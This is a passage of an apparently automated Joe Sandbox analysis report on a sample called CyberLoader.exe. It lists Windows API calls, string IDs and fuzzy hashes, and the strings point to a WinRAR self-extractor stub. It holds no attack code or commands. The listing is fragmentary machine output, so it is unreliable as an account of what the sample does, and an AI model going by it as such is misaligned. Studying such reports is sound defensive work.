                                                  • ShowWindow.USER32(?,00000000), ref: 0028964E
                                                  • GetWindowRect.USER32(?,00000000), ref: 00289693
                                                  • ShowWindow.USER32(?,00000005,00000000), ref: 0028972A
                                                  • SetWindowTextW.USER32(?,00000000), ref: 00289732
                                                  • ShowWindow.USER32(00000000,00000005), ref: 00289748
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: Window$Show$RectText
                                                  • String ID: RarHtmlClassName
                                                  • API String ID: 3937224194-1658105358
                                                  • Opcode ID: a57bafd299908c641a5436dff8296a0058f2e6db1b6465a7bbea2e42697ca041
                                                  • Instruction ID: 2e2ae708e1ec6bf512e86c06e0e9f082e65d6ace43d48f9fcbac24d064a64595
                                                  • Opcode Fuzzy Hash: a57bafd299908c641a5436dff8296a0058f2e6db1b6465a7bbea2e42697ca041
                                                  • Instruction Fuzzy Hash: D331C275416210EFCB11AF64EC4CB6BBBA8EF48301F04855AFA4996193DB30D868CF61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0029BF79: _free.LIBCMT ref: 0029BFA2
                                                  • _free.LIBCMT ref: 0029C003
                                                    • Part of subcall function 002984DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0029BFA7,?,00000000,?,00000000,?,0029BFCE,?,00000007,?,?,0029C3CB,?), ref: 002984F4
                                                    • Part of subcall function 002984DE: GetLastError.KERNEL32(?,?,0029BFA7,?,00000000,?,00000000,?,0029BFCE,?,00000007,?,?,0029C3CB,?,?), ref: 00298506
                                                  • _free.LIBCMT ref: 0029C00E
                                                  • _free.LIBCMT ref: 0029C019
                                                  • _free.LIBCMT ref: 0029C06D
                                                  • _free.LIBCMT ref: 0029C078
                                                  • _free.LIBCMT ref: 0029C083
                                                  • _free.LIBCMT ref: 0029C08E
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,002920C1,0028FB12), ref: 002920D8
                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 002920E6
                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 002920FF
                                                  • SetLastError.KERNEL32(00000000,?,002920C1,0028FB12), ref: 00292151
                                                  Similarity
                                                  • API ID: ErrorLastValue___vcrt_
                                                  • String ID:
                                                  • API String ID: 3852720340-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,?,0029895F,002985FB,?,00298FD3,00000001,00000364,?,00293713,00000050,?,002B0EE8,00000200), ref: 0029902E
                                                  • _free.LIBCMT ref: 00299063
                                                  • _free.LIBCMT ref: 0029908A
                                                  • SetLastError.KERNEL32(00000000,?,002B0EE8,00000200), ref: 00299097
                                                  • SetLastError.KERNEL32(00000000,?,002B0EE8,00000200), ref: 002990A0
                                                  Strings
                                                  Similarity
                                                  • API ID: ErrorLast$_free
                                                  • String ID: X*
                                                  • API String ID: 3170660625-76513911
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Similarity
                                                  • API ID:
                                                  • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                  • API String ID: 0-1718035505
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • _free.LIBCMT ref: 0029807E
                                                    • Part of subcall function 002984DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0029BFA7,?,00000000,?,00000000,?,0029BFCE,?,00000007,?,?,0029C3CB,?), ref: 002984F4
                                                    • Part of subcall function 002984DE: GetLastError.KERNEL32(?,?,0029BFA7,?,00000000,?,00000000,?,0029BFCE,?,00000007,?,?,0029C3CB,?,?), ref: 00298506
                                                  • _free.LIBCMT ref: 00298090
                                                  • _free.LIBCMT ref: 002980A3
                                                  • _free.LIBCMT ref: 002980B4
                                                  • _free.LIBCMT ref: 002980C5
                                                  Strings
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID: *
                                                  • API String ID: 776569668-3442289017
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00280D0D
                                                    • Part of subcall function 0027ACF5: GetVersionExW.KERNEL32(?), ref: 0027AD1A
                                                  • LocalFileTimeToFileTime.KERNEL32(?,00280CB8), ref: 00280D31
                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00280D47
                                                  • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00280D56
                                                  • SystemTimeToFileTime.KERNEL32(?,00280CB8), ref: 00280D64
                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00280D72
                                                  Similarity
                                                  • API ID: Time$File$System$Local$SpecificVersion
                                                  • String ID:
                                                  • API String ID: 2092733347-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Similarity
                                                  • API ID: _memcmp
                                                  • String ID:
                                                  • API String ID: 2931989736-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0028D2F2
                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0028D30C
                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0028D31D
                                                  • TranslateMessage.USER32(?), ref: 0028D327
                                                  • DispatchMessageW.USER32(?), ref: 0028D331
                                                  • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0028D33C
                                                  Similarity
                                                  • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                  • String ID:
                                                  • API String ID: 2148572870-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • _wcschr.LIBVCRUNTIME ref: 0028C435
                                                    • Part of subcall function 002817AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0027BB05,00000000,.exe,?,?,00000800,?,?,002885DF,?), ref: 002817C2
                                                  Strings
                                                  Similarity
                                                  • API ID: CompareString_wcschr
                                                  • String ID: <$HIDE$MAX$MIN
                                                  • API String ID: 2548945186-3358265660
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0027130B: GetDlgItem.USER32(00000000,00003021), ref: 0027134F
                                                    • Part of subcall function 0027130B: SetWindowTextW.USER32(00000000,002A35B4), ref: 00271365
                                                  • EndDialog.USER32(?,00000001), ref: 0028A9DE
                                                  • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0028A9F6
                                                  • SetDlgItemTextW.USER32(?,00000067,?), ref: 0028AA24
                                                  Strings
                                                  Similarity
                                                  • API ID: ItemText$DialogWindow
                                                  • String ID: GETPASSWORD1$xj,
                                                  • API String ID: 445417207-1809890633
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • LoadBitmapW.USER32(00000065), ref: 0028ADFD
                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 0028AE22
                                                  • DeleteObject.GDI32(00000000), ref: 0028AE54
                                                  • DeleteObject.GDI32(00000000), ref: 0028AE77
                                                    • Part of subcall function 00289E1C: FindResourceW.KERNEL32(0028AE4D,PNG,?,?,?,0028AE4D,00000066), ref: 00289E2E
                                                    • Part of subcall function 00289E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,0028AE4D,00000066), ref: 00289E46
                                                    • Part of subcall function 00289E1C: LoadResource.KERNEL32(00000000,?,?,?,0028AE4D,00000066), ref: 00289E59
                                                    • Part of subcall function 00289E1C: LockResource.KERNEL32(00000000,?,?,?,0028AE4D,00000066), ref: 00289E64
                                                  Strings
                                                  Similarity
                                                  • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                                                  • String ID: ]
                                                  • API String ID: 142272564-3352871620
                                                  • Opcode ID: 0c2c62bf6ec781e4393232d33f1f0b5a5d0a8d0b5a7b1eeb0d8129dcb30a799c
                                                  • Instruction ID: 367af5d88a5b11dee46af77ff11aafd0e378fd08da88ae61dfd6cd1559bc5f42
                                                  • Opcode Fuzzy Hash: 0c2c62bf6ec781e4393232d33f1f0b5a5d0a8d0b5a7b1eeb0d8129dcb30a799c
                                                  • Instruction Fuzzy Hash: 0B01043A952216A7D7107B64AC09A7F7B69AB91B42F0C0122BE00A72D1DE318C359BB1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0027130B: GetDlgItem.USER32(00000000,00003021), ref: 0027134F
                                                    • Part of subcall function 0027130B: SetWindowTextW.USER32(00000000,002A35B4), ref: 00271365
                                                  • EndDialog.USER32(?,00000001), ref: 0028CCDB
                                                  • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0028CCF1
                                                  • SetDlgItemTextW.USER32(?,00000066,?), ref: 0028CD05
                                                  • SetDlgItemTextW.USER32(?,00000068), ref: 0028CD14
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: ItemText$DialogWindow
                                                  • String ID: RENAMEDLG
                                                  • API String ID: 445417207-3299779563
                                                  • Opcode ID: f0d42a2e5dc3b68631763d5627ceea8af4737e9eb74b84a3b49b1e4e8d5a4663
                                                  • Instruction ID: 71dfbbe78d0312491365be5c4b62f87b31f093c649f641f2fa341cdb33773b23
                                                  • Opcode Fuzzy Hash: f0d42a2e5dc3b68631763d5627ceea8af4737e9eb74b84a3b49b1e4e8d5a4663
                                                  • Instruction Fuzzy Hash: CD0128366E6211BFD5116F64AC0CF577B5CEB6AB02F204413F349A20E1C7B1A9258B75
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 0029251A
                                                    • Part of subcall function 00292B52: ___AdjustPointer.LIBCMT ref: 00292B9C
                                                  • _UnwindNestedFrames.LIBCMT ref: 00292531
                                                  • ___FrameUnwindToState.LIBVCRUNTIME ref: 00292543
                                                  • CallCatchBlock.LIBVCRUNTIME ref: 00292567
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                  • String ID: /))
                                                  • API String ID: 2633735394-3399802696
                                                  • Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                                                  • Instruction ID: 60106cde6f7416ef060436de9b590bf3ceeeca82b78644a9bbf3c631968acf8b
                                                  • Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                                                  • Instruction Fuzzy Hash: 63011332010109FBCF12AF65DD01EDA3BBAEF58714F068014F91866120C376E975EFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00297573,00000000,?,00297513,00000000,002ABAD8,0000000C,0029766A,00000000,00000002), ref: 002975E2
                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 002975F5
                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,00297573,00000000,?,00297513,00000000,002ABAD8,0000000C,0029766A,00000000,00000002), ref: 00297618
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: 19aef653561eb81dedc2c72e7bdbc29f34e1a53594896623541dca64f4deaf3f
                                                  • Instruction ID: 0b08ef90a94404994af7bb16773283dc94232b458c3dd952e4241028b965df31
                                                  • Opcode Fuzzy Hash: 19aef653561eb81dedc2c72e7bdbc29f34e1a53594896623541dca64f4deaf3f
                                                  • Instruction Fuzzy Hash: A7F08C30A28618BBCB159FA4EC0DB9EBBB8EF06711F004069F805A2150DF308E50CB94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00280085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 002800A0
                                                    • Part of subcall function 00280085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0027EB86,Crypt32.dll,00000000,0027EC0A,?,?,0027EBEC,?,?,?), ref: 002800C2
                                                  • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0027EB92
                                                  • GetProcAddress.KERNEL32(002B81C0,CryptUnprotectMemory), ref: 0027EBA2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                  • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                  • API String ID: 2141747552-1753850145
                                                  • Opcode ID: 34b9b7f4aec6a6e3a4b552d7958b3779427183e8363f97a77c97cf705d0e32c3
                                                  • Instruction ID: d94a905cf13b675866041f3e0247c73b274ff790063f6d21f741a5847f71e27f
                                                  • Opcode Fuzzy Hash: 34b9b7f4aec6a6e3a4b552d7958b3779427183e8363f97a77c97cf705d0e32c3
                                                  • Instruction Fuzzy Hash: 90E04F714207429FCB20DF34A849B42BEE46B1A704B01C85DF4D6D3190DEB4D5648B60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: f6f609f268ff0f7c8cd3119681d0762a2d156981157ace34a3791981ecc3b680
                                                  • Instruction ID: 2b4cf4b8d6fe082cec1376c5ff4789306e7cdad2c83687314c51c78656db99e0
                                                  • Opcode Fuzzy Hash: f6f609f268ff0f7c8cd3119681d0762a2d156981157ace34a3791981ecc3b680
                                                  • Instruction Fuzzy Hash: 4C41F232A203049FCF24DF78C881A6EB7A5EF89714F5645A8E515EB381EB30ED11CB80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetEnvironmentStringsW.KERNEL32 ref: 0029B619
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0029B63C
                                                    • Part of subcall function 00298518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0029C13D,00000000,?,002967E2,?,00000008,?,002989AD,?,?,?), ref: 0029854A
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0029B662
                                                  • _free.LIBCMT ref: 0029B675
                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0029B684
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                  • String ID:
                                                  • API String ID: 336800556-0
                                                  • Opcode ID: 4ef1088e654d3da7b3ea9240ac85419fff395e0681aae946dbe744276e40e3b2
                                                  • Instruction ID: eb6658d7415c4dff67a571713175d1a937bbe9ca648ae48295aeb72864a50298
                                                  • Opcode Fuzzy Hash: 4ef1088e654d3da7b3ea9240ac85419fff395e0681aae946dbe744276e40e3b2
                                                  • Instruction Fuzzy Hash: 94018472622316BF6B225EBA7D8CC7BAA6DEEC7BA03150229FD04C3510DF60DD1195B0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00280A41: ResetEvent.KERNEL32(?), ref: 00280A53
                                                    • Part of subcall function 00280A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00280A67
                                                  • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 0028078F
                                                  • CloseHandle.KERNEL32(?,?), ref: 002807A9
                                                  • DeleteCriticalSection.KERNEL32(?), ref: 002807C2
                                                  • CloseHandle.KERNEL32(?), ref: 002807CE
                                                  • CloseHandle.KERNEL32(?), ref: 002807DA
                                                    • Part of subcall function 0028084E: WaitForSingleObject.KERNEL32(?,000000FF,00280A78,?), ref: 00280854
                                                    • Part of subcall function 0028084E: GetLastError.KERNEL32(?), ref: 00280860
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                  • String ID:
                                                  • API String ID: 1868215902-0
                                                  • Opcode ID: 4c14d7cff45e6b771ae177f440ad6f265106225fd21b8aa3423101c6e257c1d5
                                                  • Instruction ID: 0b359330c9a09f2a3d485067710fccbac6e24c43b60d9d0f236d1d4220b760e6
                                                  • Opcode Fuzzy Hash: 4c14d7cff45e6b771ae177f440ad6f265106225fd21b8aa3423101c6e257c1d5
                                                  • Instruction Fuzzy Hash: 7F019275450B04EFC721EB65EC88F86FBE9FB4A710F004519F15A821A0CB756A58CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • _free.LIBCMT ref: 0029BF28
                                                    • Part of subcall function 002984DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0029BFA7,?,00000000,?,00000000,?,0029BFCE,?,00000007,?,?,0029C3CB,?), ref: 002984F4
                                                    • Part of subcall function 002984DE: GetLastError.KERNEL32(?,?,0029BFA7,?,00000000,?,00000000,?,0029BFCE,?,00000007,?,?,0029C3CB,?,?), ref: 00298506
                                                  • _free.LIBCMT ref: 0029BF3A
                                                  • _free.LIBCMT ref: 0029BF4C
                                                  • _free.LIBCMT ref: 0029BF5E
                                                  • _free.LIBCMT ref: 0029BF70
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 3eddf787cc3853de2f58f38f5b66c77795fda3419962f2e4f9e8988caff1e603
                                                  • Instruction ID: cb11b75247616613b973baa257681ffdd43edaa470c0647565b6c5c2b459c6ae
                                                  • Opcode Fuzzy Hash: 3eddf787cc3853de2f58f38f5b66c77795fda3419962f2e4f9e8988caff1e603
                                                  • Instruction Fuzzy Hash: DAF0FF32524606A78E21EF64FECAC1677DDBE0171076A5819F008D7D10DF20FC918E64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0028AC85
                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0028AC96
                                                  • IsDialogMessageW.USER32(00010464,?), ref: 0028ACAA
                                                  • TranslateMessage.USER32(?), ref: 0028ACB8
                                                  • DispatchMessageW.USER32(?), ref: 0028ACC2
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: Message$DialogDispatchPeekTranslate
                                                  • String ID:
                                                  • API String ID: 1266772231-0
                                                  • Opcode ID: 0af14aba4c33da76d5699fae914593620d3b4d019e7b93447033ecb52586ec92
                                                  • Instruction ID: a8e89e6777d191e97c1a8ba6307ec74059b6c57125ec8a4799aa508df769a24d
                                                  • Opcode Fuzzy Hash: 0af14aba4c33da76d5699fae914593620d3b4d019e7b93447033ecb52586ec92
                                                  • Instruction Fuzzy Hash: 98F01D71D0312AEB9B20AFE2AC4CDEB7F6CEE252527408417F409D2150EA28D809C7B1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\CyberLoader.exe,00000104), ref: 002976FD
                                                  • _free.LIBCMT ref: 002977C8
                                                  • _free.LIBCMT ref: 002977D2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: _free$FileModuleName
                                                  • String ID: C:\Users\user\AppData\Local\Temp\CyberLoader.exe
                                                  • API String ID: 2506810119-36896521
                                                  • Opcode ID: af6f2f54c3d5c590a32917642608b6f8668c64ec44dcaa775c773a48500bf679
                                                  • Instruction ID: ee7d1a2412b42a71a1d5ae8fda6b8250289b10ad3211c71b157e4a61e522dadc
